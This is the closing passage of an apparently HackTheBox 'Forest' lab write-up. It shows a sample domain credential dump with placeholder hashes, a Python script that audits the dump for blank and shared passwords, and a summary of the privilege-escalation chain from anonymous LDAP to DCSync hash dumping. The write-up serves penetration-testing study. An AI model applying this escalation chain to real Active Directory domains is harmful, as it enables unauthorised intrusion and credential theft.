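htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000002:::
htb.local\legacy:1200:0123456789abcdef0123456789abcdef:00000000000000000000000000000003:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000004:::
[*] Kerberos keys grabbed
htb.local\andy:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
[*] Cleaning up...
"""

if __name__ == "__main__":
    entries = parse_dump(SAMPLE_DUMP)
    print(f"{len(entries)} credential lines parsed")
    for rule, hits in audit(entries).items():
        print(f"{rule}: {hits}")
```

The blank-password entries in the real dump are mostly the disabled Exchange system mailboxes, which is why the audit reports names rather than counts: the list has to be read against account state before it becomes a finding. Shared NT hashes are the more actionable result, since one cracked password then opens every account in the group.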
Conclusion:
So that was “Forest” for you. This machine is a Windows Domain Controller (DC) with Exchange Server installed. The DC allows anonymous LDAP binds, which were used to enumerate domain objects. The password of a service account with Kerberos pre-authentication disabled was cracked to gain the initial foothold. That service account is a member of the Account Operators group, which was used to add a user to privileged Exchange groups. The Exchange group membership was then leveraged to gain DCSync privileges on the domain and dump the NTLM hashes. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.